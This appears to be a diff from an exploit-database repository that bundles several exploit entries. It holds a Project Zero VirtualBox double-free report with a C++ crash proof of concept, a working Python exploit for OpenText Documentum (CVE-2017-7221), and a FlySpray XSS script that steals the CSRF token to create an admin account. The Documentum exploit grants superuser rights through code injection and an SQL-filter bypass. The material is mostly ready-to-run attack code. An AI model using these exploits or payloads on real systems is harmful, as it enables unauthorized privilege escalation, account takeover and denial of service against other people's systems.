Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1227
We have discovered a heap double-free vulnerability in the latest version of VirtualBox (5.1.18), with Guest Additions (and more specifically shared folders) enabled in the guest operating system. The heap memory corruption takes place in the VirtualBox.exe process running on a Windows host (other host platforms were untested). It can be triggered from an unprivileged ring-3 process running in a Windows guest, by performing two nt!NtQueryDirectoryFile system calls [1] against a shared (sub)directory one after another: the first one with the ReturnSingleEntry argument set to FALSE, and the next one with ReturnSingleEntry=TRUE. During the second system call, a double free takes place and the VM execution is aborted.
We have confirmed that the vulnerability reproduces with Windows 7/10 32-bit as the guest, and Windows 7 64-bit as the host system, but havent checked other configurations. However, it seems very likely that the specific version of Windows as the guest/host is irrelevant.
It also seems important for reproduction that the shared directory being queried has some files (preferably a few dozen) inside of it. The attached Proof of Concept program (written in C++, can be compiled with Microsoft Visual Studio) works by first creating a dedicated directory in the shared folder (called vbox_crash), and then creating 16 files with ~128 byte long names, which appears to be sufficient to always trigger the bug. Finally, it invokes the nt!NtQueryDirectoryFile syscall twice, leading to a VM crash. While the PoC requires write access to the shared folder to set up reliable conditions, it is probably not necessary in practical scenarios, as long as the shared folder already contains some files (which is most often the case).
If we assume that the shared folder is mounted as drive E, we can start the PoC as follows:
>VirtualBoxKiller.exe E:\
Immediately after pressing "enter", the virtual machine should be aborted. The last two lines of the VBoxHardening.log file corresponding to the VM should be similar to the following:
--- cut ---
3e28.176c: supR3HardNtChildWaitFor[2]: Quitting: ExitCode=0xc0000374 (rcNtWait=0x0, rcNt1=0x0, rcNt2=0x103, rcNt3=0x103, 4468037 ms, the end);
1020.3404: supR3HardNtChildWaitFor[1]: Quitting: ExitCode=0xc0000374 (rcNtWait=0x0, rcNt1=0x0, rcNt2=0x103, rcNt3=0x103, 4468638 ms, the end);
--- cut ---
The 0xc0000374 exit code above translates to STATUS_HEAP_CORRUPTION. A summary of the crash and the corresponding stack trace is as follows:
--- cut ---
1: kd> g
Critical error detected c0000374
Break instruction exception - code 80000003 (first chance)
ntdll!RtlReportCriticalFailure+0x2f:
0033:00000000`76f3f22f cc int 3
1: kd> kb
RetAddr : Args to Child : Call Site
00000000`76f3f846 : 00000000`00000002 00000000`00000023 00000000`00000087 00000000`00000003 : ntdll!RtlReportCriticalFailure+0x2f
00000000`76f40412 : 00000000`00001010 00000000`03a50000 00000000`00001000 00000000`00001000 : ntdll!RtlpReportHeapFailure+0x26
00000000`76f42084 : 00000000`03a50000 00000000`05687df0 00000000`00000000 00000000`038d0470 : ntdll!RtlpHeapHandleError+0x12
00000000`76eda162 : 00000000`05687de0 00000000`00000000 00000000`00000000 000007fe`efc8388b : ntdll!RtlpLogHeapFailure+0xa4
00000000`76d81a0a : 00000000`00000000 00000000`03f0e1b0 00000000`111fdd40 00000000`00000000 : ntdll!RtlFreeHeap+0x72
00000000`725a8d94 : 00000000`00000087 000007fe`efc3919b 00000000`08edf790 00000000`05661c00 : kernel32!HeapFree+0xa
000007fe`efc58fef : 00000000`00000086 00000000`00001000 00000000`00000000 00000000`03f0e1b0 : MSVCR100!free+0x1c
000007fe`f4613a96 : 00000000`05661d16 00000000`00000000 00000000`00000000 00000000`05687df0 : VBoxRT+0xc8fef
000007fe`f4611a48 : 00000000`056676d0 00000000`08edf830 00000000`00000000 00000000`05661c98 : VBoxSharedFolders!VBoxHGCMSvcLoad+0x1686
000007fe`ee885c22 : 00000000`111fdd30 00000000`111fdd30 00000000`03f352b0 00000000`0000018c : VBoxSharedFolders+0x1a48
000007fe`ee884a2c : 00000000`00000000 00000000`111fdd30 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x48c62
000007fe`efc13b2f : 00000000`05747fe0 00000000`00000da4 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x47a6c
000007fe`efc91122 : 00000000`05737e90 00000000`05737e90 00000000`00000000 00000000`00000000 : VBoxRT+0x83b2f
00000000`72561d9f : 00000000`05737e90 00000000`00000000 00000000`00000000 00000000`00000000 : VBoxRT+0x101122
00000000`72561e3b : 00000000`725f2ac0 00000000`05737e90 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0x43
00000000`76d759bd : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0xdf
00000000`76eaa2e1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0xd
00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x1d
--- cut ---
When the "Heaps" option is enabled for VirtualBox.exe in Application Verifier, the crash is reported in the following way:
--- cut ---
1: kd> g
=======================================
VERIFIER STOP 0000000000000007: pid 0xC08: Heap block already freed.
000000000DCB1000 : Heap handle for the heap owning the block.
000000001C37E000 : Heap block being freed again.
0000000000000000 : Size of the heap block.
0000000000000000 : Not used
=======================================
This verifier stop is not continuable. Process will be terminated
when you use the `go' debugger command.
=======================================
1: kd> kb
RetAddr : Args to Child : Call Site
000007fe`f42437ee : 00000000`00000000 00000000`1c37e000 000007fe`f42415a8 000007fe`f42520b0 : ntdll!DbgBreakPoint
000007fe`f4249970 : 00000000`265cf5b8 00000000`00000007 00000000`0dcb1000 00000000`1c37e000 : vrfcore!VerifierStopMessageEx+0x772
000007fe`f302931d : 00000000`1c186a98 00000000`00000000 00000000`265cf520 00100000`265cf520 : vrfcore!VfCoreRedirectedStopMessage+0x94
000007fe`f3026bc1 : 00000000`0dcb1000 00000000`1c37e000 00000000`00000000 00000000`0dcb1000 : verifier!AVrfpDphReportCorruptedBlock+0x155
000007fe`f3026c6f : 00000000`0dcb1000 00000000`1c37e000 00000000`0dcb1000 00000000`00002000 : verifier!AVrfpDphFindBusyMemoryNoCheck+0x71
000007fe`f3026e45 : 00000000`1c37e000 00000000`00000000 00000000`01001002 00000000`1717ed08 : verifier!AVrfpDphFindBusyMemory+0x1f
000007fe`f302870e : 00000000`1c37e000 00000000`00000000 00000000`01001002 00000000`0dcb1038 : verifier!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x25
00000000`76f440d5 : 00000000`00000000 00000000`00000000 00000000`00001000 00000000`00000000 : verifier!AVrfDebugPageHeapFree+0x8a
00000000`76ee796c : 00000000`0dcb0000 00000000`00000000 00000000`0dcb0000 00000000`00000000 : ntdll!RtlDebugFreeHeap+0x35
00000000`76d81a0a : 00000000`0dcb0000 000007fe`efc41b01 00000000`00000000 00000000`1c37e000 : ntdll! ?? ::FNODOBFM::`string'+0xe982
00000000`725a8d94 : 00000000`00000087 000007fe`efc3919b 00000000`265cfb10 00000000`1c341f00 : kernel32!HeapFree+0xa
000007fe`efc58fef : 00000000`00000086 00000000`00001000 00000000`00000000 00000000`67e40fe0 : MSVCR100!free+0x1c
000007fe`f4923a96 : 00000000`1c342076 00000000`00000000 00000000`00000000 00000000`1c37e000 : VBoxRT+0xc8fef
000007fe`f4921a48 : 00000000`5c774ff0 00000000`265cfbb0 00000000`00000000 00000000`1c341ff8 : VBoxSharedFolders!VBoxHGCMSvcLoad+0x1686
000007fe`ee595c22 : 00000000`63097f60 00000000`63097f60 00000000`25f81f30 00000000`0000018c : VBoxSharedFolders+0x1a48
000007fe`ee594a2c : 00000000`00000000 00000000`63097f60 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x48c62
000007fe`efc13b2f : 00000000`25339730 00000000`000004c8 00000000`00000000 00000000`1dce4d30 : VBoxC!VBoxDriversRegister+0x47a6c
000007fe`efc91122 : 00000000`1dce4d30 00000000`1dce4d30 00000000`00000000 00000000`00000000 : VBoxRT+0x83b2f
00000000`72561d9f : 00000000`1dce4d30 00000000`00000000 00000000`00000000 00000000`00000000 : VBoxRT+0x101122
00000000`72561e3b : 00000000`725f2ac0 00000000`1dce4d30 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0x43
00000000`76d759bd : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0xdf
00000000`76eaa2e1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0xd
00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x1d
--- cut ---
Due to the nature of the flaw (heap memory corruption), it could potentially make it possible for an unprivileged guest program to escape the VM and execute arbitrary code on the host, hence we consider it to be a high-severity issue.
References:
[1] ZwQueryDirectoryFile routine, https://msdn.microsoft.com/en-us/library/windows/hardware/ff567047(v=vs.85).aspx
*/
#include <Windows.h>
#include <winternl.h>
#include <cstdio>
#include <time.h>
extern "C"
NTSTATUS WINAPI NtQueryDirectoryFile(
_In_ HANDLE FileHandle,
_In_opt_ HANDLE Event,
_In_opt_ PIO_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcContext,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_Out_ PVOID FileInformation,
_In_ ULONG Length,
_In_ FILE_INFORMATION_CLASS FileInformationClass,
_In_ BOOLEAN ReturnSingleEntry,
_In_opt_ PUNICODE_STRING FileName,
_In_ BOOLEAN RestartScan
);
typedef struct _FILE_DIRECTORY_INFORMATION {
ULONG NextEntryOffset;
ULONG FileIndex;
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER EndOfFile;
LARGE_INTEGER AllocationSize;
ULONG FileAttributes;
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION;
int main(int argc, char **argv) {
// Validate command line format.
if (argc != 2) {
printf("Usage: %s <path to a writable shared folder>\n", argv[0]);
return 1;
}
// Initialize the PRNG.
srand((unsigned int)time(NULL));
// Create a subdirectory dedicated to demonstrating the vulnerability.
CHAR TmpDirectoryName[MAX_PATH];
_snprintf_s(TmpDirectoryName, sizeof(TmpDirectoryName), "%s\\vbox_crash", argv[1]);
if (!CreateDirectoryA(TmpDirectoryName, NULL) && GetLastError() != ERROR_ALREADY_EXISTS) {
printf("CreateDirectory failed, %d\n", GetLastError());
return 1;
}
// Create 16 files with long (128-byte) names, which appears to always be sufficient to trigger the bug.
CONST UINT kTempFilesCount = 16;
CONST UINT kTempFilenameLength = 128;
CHAR TmpFilename[kTempFilenameLength + 1], TmpFilePath[MAX_PATH];
memset(TmpFilename, 'A', kTempFilenameLength);
TmpFilename[kTempFilenameLength] = '\0';
for (UINT i = 0; i < kTempFilesCount; i++) {
_snprintf_s(TmpFilePath, sizeof(TmpFilePath), "%s\\%s.%u", TmpDirectoryName, TmpFilename, rand());
HANDLE hFile = CreateFileA(TmpFilePath, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
printf("CreateFile#1 failed, %d\n", GetLastError());
return 1;
}
CloseHandle(hFile);
}
// Open the temporary directory.
HANDLE hDirectory = CreateFileA(TmpDirectoryName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
if (hDirectory == INVALID_HANDLE_VALUE) {
printf("CreateFile#2 failed, %d\n", GetLastError());
return 1;
}
IO_STATUS_BLOCK iosb;
FILE_DIRECTORY_INFORMATION fdi;
// Perform the first call, with ReturnSingleEntry set to FALSE.
NtQueryDirectoryFile(hDirectory, NULL, NULL, NULL, &iosb, &fdi, sizeof(fdi), FileDirectoryInformation, FALSE, NULL, TRUE);
// Now make the same call, but with ReturnSingleEntry=TRUE. This should crash VirtualBox.exe on the host with a double-free exception.
NtQueryDirectoryFile(hDirectory, NULL, NULL, NULL, &iosb, &fdi, sizeof(fdi), FileDirectoryInformation, TRUE, NULL, TRUE);
// We should never reach here.
CloseHandle(hDirectory);
return 0;
}

1046
platforms/multiple/webapps/41927.txt Executable file
View file

File diff suppressed because it is too large Load diff

598
platforms/multiple/webapps/41928.py Executable file
View file

@ -0,0 +1,598 @@
'''
CVE Identifier: CVE-2017-7221
Vendor: OpenText
Affected products: OpenText Documentum Content Server (all versions)
Researcher: Andrey B. Panfilov
Severity Rating: CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Fix: not available
PoC: https://gist.github.com/andreybpanfilov/0a4fdfad561e59317a720e702b0fec44
Description:
all versions of Documentum Content Server contain dm_bp_transition docbase
method ("stored procedure”) which is written on basic, implementation of this docbase
methods does not properly validate user input which allows attacker to execute arbitrary
code with superuser privileges.
Related code snippet is:
==========================================8<========================================
'Evaluate the user-defined entry criteria
If (result = True And run_entry = "T") Then
If (debug = True) Then
PrintToLog sess, "Run user defined entry criteria."
End If
'
' researcher comment:
' userEntryID parameter is controlled by attacker
'
result = RunProcedure(userEntryID, 1, sess, sysID,_
user_name, targetState)
End If
...
'
' researcher comment:
' procID parameter is controlled by attacker
'
Function RunProcedure(procID As String, procNo As Integer,_
sessID As String, objID As String, userName As String,_
targetState As String) As Boolean
...
StartIt:
If (procID <> "0000000000000000") Then
result = CheckStatus("", 1, "loading procedure " & procID, True, errorMsg)
'
' researcher comment:
' here basic interpreter loads content of user-provided script
' from underlying repostiory using following technique:
'
' checking that it is dealing with dm_procedure object
' (check was introduced in CVE-2014-2513):
' id,c,dm_procedure where r_object_id='procID'
'
' getting content of basic script
' fetch,c,procID
' getpath,c,l
'
result = external(procID)
If (result = True) Then
If (procNo = 1) Then
' --- Running user-defined entry criteria ---
result = CheckStatus("", 1, "Running EntryCriteria", True, errorMsg)
On Error Goto NoFunction
'
' researcher comment
' here dmbasic interpreter executes user defined function
'
result = EntryCriteria(sessID, objID, userName,_
targetState, errorStack)
If (result = False) Then
errorStack = "[ErrorCode] 1500 [ServerError] " + _
errorStack
End If
==========================================>8========================================
So, attacker is able to create its own basic procedure in repository and pass its identifier
as argument for dm_bp_transition procedure:
==========================================8<========================================
$ cat /tmp/test
cat: /tmp/test: No such file or directory
$ cat > test.ebs
Public Function EntryCriteria(ByVal SessionId As String,_
ByVal ObjectId As String,_
ByVal UserName As String,_
ByVal TargetState As String,_
ByRef ErrorString As String) As Boolean
t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")
EntryCriteria=True
End Function
$ iapi
Please enter a docbase name (docubase): repo
Please enter a user (dmadmin): unprivileged_user
Please enter password for unprivileged_user:
EMC Documentum iapi - Interactive API interface
(c) Copyright EMC Corp., 1992 - 2011
All rights reserved.
Client Library Release 6.7.1000.0027
Connecting to Server using docbase repo
[DM_SESSION_I_SESSION_START]info: "Session 0101d920800b1a37
started for user unprivileged_user."
Connected to Documentum Server running Release 6.7.1090.0170 Linux.Oracle
Session id is s0
API> create,c,dm_procedure
...
0801d920804e5416
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
OK
API> ?,c,execute do_method with method='dm_bp_transition',
arguments='repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 0801d920804e5416 0000000000000000 0000000000000000
0000000000000000 "" 0 0 T F T T dmadmin 0000000000000000'
(1 row affected)
API> Bye
$ cat /tmp/test
dm_bp_transition_has_vulnerability
==========================================>8========================================
Vendor was been notified about this vulnerability on November 2013 using customer
support channel, after a while vendor started claiming that this vulnerability
was remediated, though no CVE was announced. Moreover, the fix was contested
and CERT/CC started tracking this vulnerability, the PoC provided
to CERT/CC was:
==========================================8<========================================
Vendor have decided that the root cause of problem is users are able to
create dm_procedure objects, and now in Documentum Content Server
v6.7SP1P26 we have following behavior:
[DM_SESSION_I_SESSION_START]info: "Session 0101d920800f0174 started for
user unprivileged_user."
Connected to Documentum Server running Release 6.7.1260.0322 Linux.Oracle
Session id is s0
API> create,c,dm_procedure
...
0801d920805929d0
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
[DM_USER_E_NEED_SU_OR_SYS_PRIV]error: "The current user
(unprivileged_user) needs to have superuser or sysadmin privilege."
BUT:
API> create,c,dm_document
...
0901d920805929dd
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
OK
API> ?,c,execute do_method with
method='dm_bp_transition',arguments='repo repo dmadmin ""
0000000000000000 0000000000000000 0000000000000000 0901d920805929dd
0000000000000000 0000000000000000 0000000000000000 "" 0 0 T F T T
dmadmin 0000000000000000'
(1 row affected)
....
API> Bye
~]$ cat /tmp/test
dm_bp_transition_has_vulnerability
~]$
==========================================>8========================================
On July 2014 vendor announced ESA-2014-064 which was claiming that vulnerability has been remediated.
On November 2014 fix was contested (there was significant delay after ESA-2014-064 because vendor
constantly fails to provide status of reported vulnerabilities) by providing another proof of concept,
description provided to CERT/CC was:
==========================================8<========================================
I have tried to reproduce PoC, described in VRF#HUFPRMOP, and got following
error:
[ErrorCode] 1000 [Parameter] 0801fd08805c9dfe [ServerError] Unexpected
error: [DM_API_W_NO_MATCH]warning: "There was no match in the
docbase for the qualification: dm_procedure where r_object_id =
'0801fd08805c9dfe'"
Such behaviour means that EMC tried to remediate a security issue by
"checking" object type of supplied object:
Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle
Session id is s0
API> id,c,dm_procedure where r_object_id = '0801fd08805c9dfe'
...
[DM_API_W_NO_MATCH]warning: "There was no match in the docbase for the
qualification: dm_procedure where r_object_id = '0801fd08805c9dfe'"
API> Bye
bin]$ strings dmbasic| grep dm_procedure
id,%s,dm_procedure where object_name = '%s' and folder('%s')
id,%s,dm_procedure where r_object_id = '%s'
# old version of dmbasic binary
bin]$ strings dmbasic| grep dm_procedure
bin]$
So, the fix was implemented in dmbasic binary, the problem is neither 6.7
SP2 P15 nor 6.7 SP1 P28 patches contain dmbasic binary - the first patch
that was shipped with dmbasic binary was 6.7SP2 P17. Moreover, the
issue is still reproducible because introduced check could be bypassed
using SQL injection:
~]$ cat test.ebs
Public Function EntryCriteria(ByVal SessionId As String,_
ByVal ObjectId As String,_
ByVal UserName As String,_
ByVal TargetState As String,_
ByRef ErrorString As String) As Boolean
t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")
EntryCriteria=True
End Function
~]$ cat /tmp/test
cat: /tmp/test: No such file or directory
~]$ iapi
Please enter a docbase name (docubase): repo
Please enter a user (dmadmin): test01
Please enter password for test01:
EMC Documentum iapi - Interactive API interface
(c) Copyright EMC Corp., 1992 - 2011
All rights reserved.
Client Library Release 6.7.2190.0142
Connecting to Server using docbase repo
[DM_SESSION_I_SESSION_START]info: "Session 0101fd088014000c started for
user test01."
Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle
Session id is s0
API> create,c,dm_sysobject
...
0801fd08805c9dfe
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
OK
API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 "0801fd08805c9dfe,'' union select r_object_id
from dm_sysobject where r_object_id=''0801fd08805c9dfe"
0000000000000000 0000000000000000 0000000000000000 ""
0 0 T F T T dmadmin 0000000000000000'
...
(1 row affected)
API> Bye
~]$ cat /tmp/test
dm_bp_transition_has_vulnerability
~]$
Here "union ..." allows to bypass check based on "id" call:
Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle
Session id is s0
API> id,c,dm_procedure where r_object_id='0801fd08805c9dfe,' union
select r_object_id from dm_sysobject where
r_object_id='0801fd08805c9dfe'
...
0801fd08805c9dfe
API> apply,c,,GET_LAST_SQL
...
q0
API> next,c,q0
...
OK
API> get,c,q0,result
...
select all dm_procedure.r_object_id from dm_procedure_sp dm_procedure where
((dm_procedure.r_object_id='0801fd08805c9dfe,')) and
(dm_procedure.i_has_folder = 1 and dm_procedure.i_is_deleted = 0)
union select all dm_sysobject.r_object_id from dm_sysobject_sp
dm_sysobject where ((dm_sysobject.r_object_id= '0801fd08805c9dfe'))
and (dm_sysobject.i_has_folder = 1 and dm_sysobject.i_is_deleted = 0)
API> close,c,q0
...
OK
Comma is required to bypass error in fetch call:
API> fetch,c,0801fd08805c9dfe' union select r_object_id from
dm_sysobject where r_object_id='0801fd08805c9dfe
...
[DM_API_E_BADID]error: "Bad ID given: 0801fd08805c9dfe' union
select r_object_id from dm_sysobject where r_object_id=
'0801fd08805c9dfe"
API> fetch,c,0801fd08805c9dfe,' union select r_object_id from
dm_sysobject where r_object_id='0801fd08805c9dfe
...
OK
==========================================>8========================================
On August 2015 vendor had undertaken another attempt to remediate this vulnerability
check ESA-2015-131/CVE-2015-4533 for details.
On August 2015 the fix was contested, check http://seclists.org/bugtraq/2015/Aug/110
for detailed description - I just demonstrated another attack vector - using
UNION ALL keyword instead of UNION:
=================================8<================================
API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 "0801fd08805c9dfe,'' union select r_object_id
from dm_sysobject where r_object_id=''0801fd08805c9dfe"
0000000000000000 0000000000000000 0000000000000000 ""
0 0 T F T T dmadmin 0000000000000000'
[DM_METHOD_E_METHOD_ARGS_INVALID]error:
"The arguments being passed to the method 'dm_bp_transition' are
invalid:
arguments contain sql keywords which are not allowed."
New attack vector (note ALL keyword):
API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 "0801fd08805c9dfe,'' union all select r_object_id
from dm_sysobject where r_object_id=''0801fd08805c9dfe"
0000000000000000 0000000000000000 0000000000000000 ""
0 0 T F T T dmadmin 0000000000000000'
=================================>8================================
Recently I have noticed that latest versions of Documentum Content
Server are not affected by the PoC provided above, however all versions
of Documentum Content Server are still vulnerable because vendor incorrectly
implemented input validation: they convert arguments to lower/upper-case,
replace line feed, carriage return and tab characters by a space,
remove double spaces, after that they check where resulting string contains
special keywords ('union ' and 'union all') or not - it is possible
to use other whitespace characters like backspace, which is demonstrated
in the PoC.
__
Regards,
Andrey B. Panfilov
CVE-2017-7221.py
'''
#!/usr/bin/env python
import socket
import sys
from os.path import basename
from dctmpy.docbaseclient import DocbaseClient
from dctmpy.obj.typedobject import TypedObject
CIPHERS = "ALL:aNULL:!eNULL"
def usage():
print "usage:\n\t%s host port user password" % basename(sys.argv[0])
def main():
if len(sys.argv) != 5:
usage()
exit(1)
(session, docbase) = create_session(*sys.argv[1:5])
if is_super_user(session):
print "Current user is a superuser, nothing to do"
exit(1)
install_owner = session.serverconfig['r_install_owner']
document_id = session.next_id(0x08)
content_id = session.next_id(0x06)
store = session.get_by_qualification("dm_store")
format = session.get_by_qualification("dm_format where name='crtext'")
handle = session.make_pusher(store['r_object_id'])
if handle < 1:
print "Unable to create pusher"
exit(1)
data = "Public Function EntryCriteria(ByVal SessionId As String,_" \
"\nByVal ObjectId As String,_" \
"\nByVal UserName As String,_" \
"\nByVal TargetState As String,_" \
"\nByRef ErrorString As String) As Boolean" \
"\nDim QueryID As String" \
"\nDim Query As String" \
"\nQuery = \"query,c,update dm_user objects set " \
"user_privileges=16 where user_name=\'%s\'\"" \
"\nQueryID = dmAPIGet(Query)" \
"\nQueryID = dmAPIExec(\"commit,c\")" \
"\nEntryCriteria=True" \
"\nEnd Function" % (sys.argv[3])
b = bytearray()
b.extend(data)
if not session.start_push(handle, content_id, format['r_object_id'], len(b)):
print "Failed to start push"
exit(1)
session.upload(handle, b)
data_ticket = session.end_push_v2(handle)['DATA_TICKET']
procedure = False
try:
print "Trying to create dm_procedure"
document = TypedObject(session=session)
document.set_string("OBJECT_TYPE", "dm_procedure")
document.set_bool("IS_NEW_OBJECT", True)
document.set_int("i_vstamp", 0)
document.set_int("world_permit", 7)
document.set_string("object_name", "CVE-2014-2513")
document.set_string("r_object_type", "dm_procedure")
document.append_id("i_contents_id", content_id)
document.set_int("r_page_cnt", 1)
document.set_string("a_content_type", format['name'])
document.set_bool("i_has_folder", True)
document.set_bool("i_latest_flag", True)
document.set_id("i_chronicle_id", document_id)
document.append_string("r_version_label", ["1.0", "CURRENT"])
document.set_int("r_content_size", len(b))
if session.sys_obj_save(document_id, document):
procedure = True
except Exception, e:
print str(e)
if not procedure:
print "Failed to create dm_procedure"
print "Trying to create dm_sysobject"
document = TypedObject(session=session)
document.set_string("OBJECT_TYPE", "dm_sysobject")
document.set_bool("IS_NEW_OBJECT", True)
document.set_int("i_vstamp", 0)
document.set_string("owner_name", sys.argv[3])
document.set_int("world_permit", 7)
document.set_string("object_name", "CVE-2017-7221")
document.set_string("r_object_type", "dm_sysobject")
document.append_id("i_contents_id", content_id)
document.set_int("r_page_cnt", 1)
document.set_string("a_content_type", format['name'])
document.set_bool("i_has_folder", True)
document.set_bool("i_latest_flag", True)
document.set_id("i_chronicle_id", document_id)
document.append_string("r_version_label", ["1.0", "CURRENT"])
document.set_int("r_content_size", len(b))
if not session.sys_obj_save(document_id, document):
print "Failed to create dm_sysobject"
exit(1)
content = TypedObject(session=session)
content.set_string("OBJECT_TYPE", "dmr_content")
content.set_bool("IS_NEW_OBJECT", True)
content.set_id("storage_id", store['r_object_id'])
content.set_id("format", format['r_object_id'])
content.set_int("data_ticket", data_ticket)
content.set_id("parent_id", document_id)
content.set_int("page", 0)
content.set_string("full_format", format['name'])
content.set_int("content_size", len(b))
if not session.save_cont_attrs(content_id, content):
print "Failed to create content"
exit(1)
if procedure:
query = "execute do_method WITH METHOD='dm_bp_transition'," \
" ARGUMENTS='%s %s %s \"\" 0000000000000000 " \
"0000000000000000 0000000000000000 \"%s\" " \
"0000000000000000 0000000000000000 0000000000000000 " \
"\"\" 0 0 T F T T %s %s'" % \
(docbase, docbase, install_owner, document_id,
install_owner, session.session)
else:
query = "execute do_method WITH METHOD='dm_bp_transition'," \
" ARGUMENTS='%s %s %s \"\" 0000000000000000 " \
"0000000000000000 0000000000000000 \"%s,'' " \
"union\b select r_object_id from dm_sysobject(all) where r_object_id=''%s\" " \
"0000000000000000 0000000000000000 0000000000000000 " \
"\"\" 0 0 T F T T %s %s'" % \
(docbase, docbase, install_owner, document_id,
document_id, install_owner, session.session)
session.query(query)
r = session.query(
"select user_privileges from dm_user "
"where user_name=USER") \
.next_record()['user_privileges']
if r != 16:
print "Failed"
exit(1)
print "P0wned!"
def create_session(host, port, user, pwd, identity=None):
print "Trying to connect to %s:%s as %s ..." % \
(host, port, user)
session = None
try:
session = DocbaseClient(
host=host, port=int(port),
username=user, password=pwd,
identity=identity)
except socket.error, e:
if e.errno == 54:
session = DocbaseClient(
host=host, port=int(port),
username=user, password=pwd,
identity=identity,
secure=True, ciphers=CIPHERS)
else:
raise e
docbase = session.docbaseconfig['object_name']
version = session.serverconfig['r_server_version']
print "Connected to %s:%s, docbase: %s, version: %s" % \
(host, port, docbase, version)
return (session, docbase)
def is_super_user(session):
user = session.get_by_qualification(
"dm_user WHERE user_name=USER")
if user['user_privileges'] == 16:
return True
group = session.get_by_qualification(
"dm_group where group_name='dm_superusers' "
"AND any i_all_users_names=USER")
if group is not None:
return True
return False
if __name__ == '__main__':
main()

58
platforms/php/webapps/41918.txt Executable file
View file

@ -0,0 +1,58 @@
# Exploit Title: XSRF Stored FlySpray 1.0-rc4 (XSS2CSRF add admin account)
# Date: 19/04/2017
# Exploit Author: Cyril Vallicari / HTTPCS / ZIWIT
: https://www.openoffice.org
# Version: 1.0-rc4
# Tested on: Windows 7 x64 SP1 / Kali Linux
Description :
A vulnerability has been discovered in Flyspray , which can be
exploited by malicious people to conduct cross-site scripting attacks. Input
passed via the 'real_name' parameter to '/index.php?do=myprofile' is not
properly sanitised before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in
context of an affected site.
The script is executed on the parameter page AND on any page that allow the
user to put a comment.
This XSS vector allow to execute scripts to gather the CSRF token
and submit a form to create a new admin
Here's the script :
var tok = document.getElementsByName('csrftoken')[0].value;
var txt = '<form method="POST" id="hacked_form"
action="index.php?do=admin&area=newuser">'
txt += '<input type="hidden" name="action" value="admin.newuser"/>'
txt += '<input type="hidden" name="do" value="admin"/>'
txt += '<input type="hidden" name="area" value="newuser"/>'
txt += '<input type="hidden" name="user_name" value="hacker"/>'
txt += '<input type="hidden" name="csrftoken" value="' + tok + '"/>'
txt += '<input type="hidden" name="user_pass" value="12345678"/>'
txt += '<input type="hidden" name="user_pass2" value="12345678"/>'
txt += '<input type="hidden" name="real_name" value="root"/>'
txt += '<input type="hidden" name="email_address" value="root@root.com"/>'
txt += '<input type="hidden" name="verify_email_address" value="
root@root.com"/>'
txt += '<input type="hidden" name="jabber_id" value=""/>'
txt += '<input type="hidden" name="notify_type" value="0"/>'
txt += '<input type="hidden" name="time_zone" value="0"/>'
txt += '<input type="hidden" name="group_in" value="1"/>'
txt += '</form>'
var d1 = document.getElementById('menu');
d1.insertAdjacentHTML('afterend', txt);
document.getElementById("hacked_form").submit();
This will create a new admin account, hacker:12345678
POC video : *https://www.youtube.com/watch?v=eCf9a0QpnPs
Patch : No patch yet

63
platforms/php/webapps/41919.txt Executable file
View file

@ -0,0 +1,63 @@
# Exploit Title: KittyCatfish 2.2 Plugin for WordPress - SQL Injection
# Date: 20/03/2017
# Exploit Author: TAD GROUP
# Vendor Homepage: https://wordpress.org/plugins-wp/kittycatfish/
# Software Link: https://wordpress.org/plugins-wp/kittycatfish/
# Version: 2.2
# Contact: info@tad.bg
# Website: https://tad.bg <https://tad.bg>
# Category: Web Application Exploits
1. Description
